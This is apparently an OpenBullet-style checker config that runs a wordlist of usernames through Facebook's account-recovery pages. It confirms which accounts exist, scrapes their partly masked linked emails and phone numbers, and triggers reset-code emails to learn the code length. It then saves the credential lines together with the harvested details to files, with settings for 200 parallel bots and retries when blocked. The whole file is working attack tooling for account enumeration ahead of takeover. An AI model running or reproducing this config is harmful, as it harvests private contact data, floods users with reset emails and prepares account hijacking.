[SETTINGS]
{
  "Name": "check code 6-8 chuẩn",
  "SuggestedBots": 200,
  "MaxCPM": 0,
  "LastModified": "2024-03-12T10:13:51.9127073+07:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "t.me/cuanh_sel",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": true,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "check code 6-8 chuẩn",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
#UserLowerkey[UL] FUNCTION ToLowercase "<USER>" -> VAR "UL" 

#UsernameEncoding[UE] FUNCTION URLEncode "<UL>" -> VAR "UE" 

#Get_Data REQUEST GET "https://mbasic.facebook.com/login/identify/?" 
  
  HEADER "accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "accept-language: vi-VN,vi;q=0.9" 
  HEADER "cache-control: max-age=0" 
  HEADER "sec-ch-ua: \"Chromium\";v=\"92\", \" Not A;Brand\";v=\"99\", \"Google Chrome\";v=\"92\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "sec-fetch-dest: document" 
  HEADER "sec-fetch-mode: navigate" 
  HEADER "sec-fetch-site: none" 
  HEADER "sec-fetch-user: ?1" 
  HEADER "upgrade-insecure-requests: 1" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" 

#Get_LSD PARSE "<SOURCE>" LR "name=\"lsd\" value=\"" "\" autocomplete=\"off\" />" -> VAR "LSD" 

#Get_JST PARSE "<SOURCE>" LR "name=\"jazoest\" value=\"" "\" autocomplete=\"off\" />" -> VAR "JST" 

#Lenght_Data[LEN] FUNCTION Length "lsd=<LSD>&jazoest=<JST>&email=<UE>&did_submit=T%C3%ACm+ki%E1%BA%BFm" -> VAR "LEN" 

#Valid_Facebook_Checker REQUEST POST "https://mbasic.facebook.com/login/identify/?" 
  CONTENT "lsd=<LSD>&jazoest=<JST>&email=<UE>&did_submit=T%C3%ACm+ki%E1%BA%BFm" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "accept-language: vi" 
  HEADER "cache-control: max-age=0" 
  HEADER "content-length: <LEN>" 
  HEADER "content-type: application/x-www-form-urlencoded" 
  HEADER "origin: https://mbasic.facebook.com" 
  HEADER "referer: https://mbasic.facebook.com/login/identify/?ctx=recover&c=https%3A%2F%2Fmbasic.facebook.com%2F&multiple_results=0&ars=facebook_login&from_login_screen=0&lwv=100&_rdr" 
  HEADER "sec-ch-ua: \" Not A;Brand\";v=\"99\", \"Chromium\";v=\"98\", \"Google Chrome\";v=\"98\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "sec-ch-ua-platform: \"Windows\"" 
  HEADER "sec-fetch-dest: document" 
  HEADER "sec-fetch-mode: navigate" 
  HEADER "sec-fetch-site: same-origin" 
  HEADER "sec-fetch-user: ?1" 
  HEADER "upgrade-insecure-requests: 1" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36" 

#Check_Valid KEYCHECK 
  KEYCHAIN Success OR 
    KEY "account_recovery_initiate_view_label" 
    KEY "account_recovery" 
    KEY "device-based" 
    KEY "Try entering your password" 
    KEY "Log in to Google" 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "login_identify_search_error_msg" 
  KEYCHAIN Failure OR 
    KEY "Account disabled" 
  KEYCHAIN Retry OR 
    KEY "You’re Temporarily Blocked" 
    KEY "Your request couldn't be processed" 

#Get_LData REQUEST POST "https://www.facebook.com/ajax/login/help/identify.php?ctx=recover" 
  CONTENT "jazoest=2949&lsd=AVpEsWISSEk&email=<UE>&did_submit=1&__user=0&__a=1&__dyn=7xeUmBwjbg7ebwKBWo5O12wAxu13wqovzEdEc8uxa0z8S2S4o1j8hwem0nCq1ewcG0KEswaq0woy1Qw5MKdwl8G0DE7e2l0Fwwwi831wnEfo5m1mwKw8y4Ueo2swkEbEaU2ewnE2Lw5dwp8Gdw&__csr=&__req=6&__hs=18843.PHASED%3ADEFAULT.2.0.0.0&dpr=1&__ccg=GOOD&__rev=1004203315&__s=spdrfy%3A8bxzlm%3Albc6us&__hsi=6992643626398717803-0&__comet_req=0&__spin_r=1004203315&__spin_b=trunk&__spin_t=1628101716" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Host: www.facebook.com" 
  HEADER "Connection: keep-alive" 
  HEADER "X-FB-LSD: AVpEsWISSEk" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36" 
  HEADER "sec-ch-ua: \"Chromium\";v=\"92\", \" Not A;Brand\";v=\"99\", \"Microsoft Edge\";v=\"92\"" 
  HEADER "Content-Type: application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "Origin: https://www.facebook.com" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Referer: https://www.facebook.com/login/identify/?ctx=recover&ars=facebook_login&from_login_screen=0" 
  HEADER "Accept-Language: en-US,en;q=0.9" 
  HEADER "Accept-Encoding: gzip, deflate" 
  HEADER "Content-Length: 1120" 

#Ldata[L] PARSE "<SOURCE>" LR "recover\\\\\\/initiate\\\\\\/?ldata=" "\\\"\"],\"hsrp\":{\"" -> VAR "L" 

#Check_Email_Number REQUEST GET "https://business.facebook.com/recover/initiate/?ldata=<L>" 
  
  HEADER "accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "accept-language: vi" 
  HEADER "sec-ch-ua: \" Not A;Brand\";v=\"99\", \"Chromium\";v=\"98\", \"Google Chrome\";v=\"98\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "sec-ch-ua-platform: \"Windows\"" 
  HEADER "sec-fetch-dest: document" 
  HEADER "sec-fetch-mode: navigate" 
  HEADER "sec-fetch-site: none" 
  HEADER "sec-fetch-user: ?1" 
  HEADER "upgrade-insecure-requests: 1" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36" 

#Email_Number PARSE "<SOURCE>" LR "</strong><br /><div>" "</div></div></div></div></label></div></label>" -> VAR "Email01" 

#Replace_Tag FUNCTION Replace "</div><div>" " & " "<Email01>" -> VAR "Email02" 

#Current_Emails FUNCTION HTMLEntityDecode "<Email02>" -> VAR "Current Emails" 

IF "<Current Emails>" Contains "<UL>"

#MailType FUNCTION Constant "Mail OK" -> VAR "MailType" 

ENDIF
IF "<Current Emails>" DoesNotContain "<UL>"

#MailType FUNCTION Constant "Mail Ẩn" -> VAR "MailType" 

ENDIF

#SMS PARSE "<SOURCE>" LR "</strong><br /><div" "</label></td></tr></table></td><" -> VAR "SMS" 

#SMS PARSE "<SMS>" LR "dir=\"ltr\">" "</div></div></div></div></label></div>" -> VAR "SMS01" 

#SMS02 PARSE "<SMS>" LR "</strong><br /><div dir=\"ltr\">" "</div>" -> VAR "SMS02" 

#Current_SMS FUNCTION Constant "<SMS01>&<SMS02>" -> VAR "Current SMS" 

#Check_Recover_Code REQUEST GET "https://mbasic.facebook.com/recover/code/?em%5B0%5D=<USER>&rm=send_email&c=%2Flogin%2F&hash=AUYyo-faOWGtMojxdbQ&_rdr" 
  
  HEADER "sec-ch-ua: \"Chromium\";v=\"92\", \" Not A;Brand\";v=\"99\", \"Google Chrome\";v=\"92\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "sec-fetch-dest: document" 
  HEADER "sec-fetch-mode: navigate" 
  HEADER "sec-fetch-site: same-origin" 
  HEADER "sec-fetch-user: ?1" 
  HEADER "upgrade-insecure-requests: 1" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" 
  HEADER "accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "accept-language: vi-VN,vi;q=0.9" 
  HEADER "cache-control: max-age=0" 

#Recover_Code PARSE "<SOURCE>" LR "<section class=\"" ".</section><section>" CreateEmpty=FALSE -> VAR "Recover_Code" 

IF "<Recover_Code>" Contains "8"
SET VAR "CODE" "8"
ENDIF
IF "<Recover_Code>" Contains "6"
SET VAR "CODE" "6"
ENDIF

#Type_Code FUNCTION Constant "<CODE>" -> VAR "Type_Code" 

#Email_Information FUNCTION Constant "<Current Emails> | <Current SMS> | <MailType> | <Type_Code>" -> CAP "Email Information" 

#GetDate FUNCTION CurrentUnixTime -> VAR "GetDate" 

#DATE FUNCTION UnixTimeToDate "dd_MM_yyy" "<GetDate>" -> VAR "DATE" 

#Save UTILITY File "Mail Liên Kết Facebook\\<DATE>\\<MailType>\\<Type_Code>.txt" AppendLines "<USER><PASS> ===> <Email Information>" -> VAR "Save" 

